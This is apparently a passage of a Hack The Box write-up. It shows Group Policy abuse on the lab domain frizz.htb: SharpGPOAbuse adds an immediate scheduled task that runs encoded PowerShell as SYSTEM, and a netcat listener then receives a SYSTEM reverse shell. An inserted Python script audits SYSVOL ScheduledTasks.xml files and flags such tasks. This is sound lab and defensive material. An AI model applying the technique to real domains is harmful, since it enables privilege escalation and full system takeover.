[+] GUID of "chw" is: {BC54F62C-D0BC-4C50-AFD7-43E0ACE49DA2}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{BC54F62C-D0BC-4C50-AFD7-43E0ACE49DA2}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus\Desktop> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

  • --addcomputertask: adds an "Immediate Task" under Computer Configuration → Preferences → Scheduled Tasks
  • --gponame "chw": display name of the target GPO (its GUID is looked up in AD first)
  • --author TCG: the author field of the scheduled task (metadata written into the XML)
  • --taskname PrivEsc: the task name (the name of the task created on the client)
  • --command "powershell.exe": the executable the task launches
  • --arguments "powershell -e <Base64>": the arguments passed to that executable
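From the defender's side, the artefact this step leaves behind is the Group Policy Preferences file ScheduledTasks.xml under \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\ScheduledTasks\. The following is an added example (not code from the writeup or from SharpGPOAbuse) that parses such a file and flags ImmediateTaskV2 entries running PowerShell as SYSTEM with an encoded command line; the XML is constructed to follow the GPP schema and its base64 is a placeholder.

```python
"""Audit a GPP ScheduledTasks.xml from SYSVOL for immediate tasks of the kind
SharpGPOAbuse --addcomputertask creates. Constructed example; sample XML below is
modelled on the GPP schema and its base64 argument is a placeholder."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample: one immediate SYSTEM task with encoded PowerShell (the pattern from
# the writeup) and one benign user-context maintenance task for contrast.
SAMPLE_SCHEDULEDTASKS_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="PrivEsc" image="0"
                   changed="2025-06-08 15:55:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="PrivEsc" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Author>TCG</Author></RegistrationInfo>
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>powershell -e AAAAPLACEHOLDERAAAA</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Cleanup" image="0"
          changed="2024-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" name="Cleanup" runAs="%LogonDomain%\\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec><Command>cleanmgr.exe</Command><Arguments>/sagerun:1</Arguments></Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""


@dataclass
class GppTask:
    kind: str        # element name: ImmediateTaskV2, TaskV2, ...
    name: str
    run_as: str
    command: str
    arguments: str
    author: str


def parse_gpp_tasks(xml_text: str) -> list:
    """Extract every task entry (any *TaskV2 element) with its run-as identity and Exec action."""
    root = ET.fromstring(xml_text)
    tasks = []
    for node in root:
        props = node.find("Properties")
        if props is None:
            continue
        exec_node = props.find(".//Exec")
        command = exec_node.findtext("Command", "") if exec_node is not None else ""
        arguments = exec_node.findtext("Arguments", "") if exec_node is not None else ""
        tasks.append(GppTask(kind=node.tag, name=props.get("name", node.get("name", "")),
                             run_as=props.get("runAs", ""), command=command,
                             arguments=arguments,
                             author=props.findtext(".//RegistrationInfo/Author", "")))
    return tasks


# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_PS = re.compile(r"(?i)(^|\s)-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}")


def task_findings(task: GppTask) -> list:
    """Return the individual indicators a task matches; an empty list means nothing notable."""
    findings = []
    if task.kind == "ImmediateTaskV2":
        findings.append("immediate task: fires on the next policy refresh (gpupdate)")
    if "system" in task.run_as.lower():
        findings.append("runs as NT AUTHORITY\\SYSTEM")
    if "powershell" in (task.command + " " + task.arguments).lower():
        findings.append("launches PowerShell")
    if ENCODED_PS.search(task.arguments):
        findings.append("encoded PowerShell command line")
    return findings


def suspicious_tasks(xml_text: str, min_findings: int = 3) -> list:
    """(task, findings) pairs that hit at least min_findings indicators."""
    results = []
    for task in parse_gpp_tasks(xml_text):
        findings = task_findings(task)
        if len(findings) >= min_findings:
            results.append((task, findings))
    return results
```

Pair this with alerting on new objects under CN=Policies,CN=System and on changes to Group Policy Creator Owners membership, which is the group that made this path possible.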

(Kali)

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ nc -lvnp 8888               
listening on [any] 8888 ...

connect to [10.10.14.67] from (UNKNOWN) [10.10.11.60] 53183
PS C:\Windows\system32>whoami
nt authority\system

✅ Get Root FLAG


tags: HTB Web CTF Windows GPO Abuse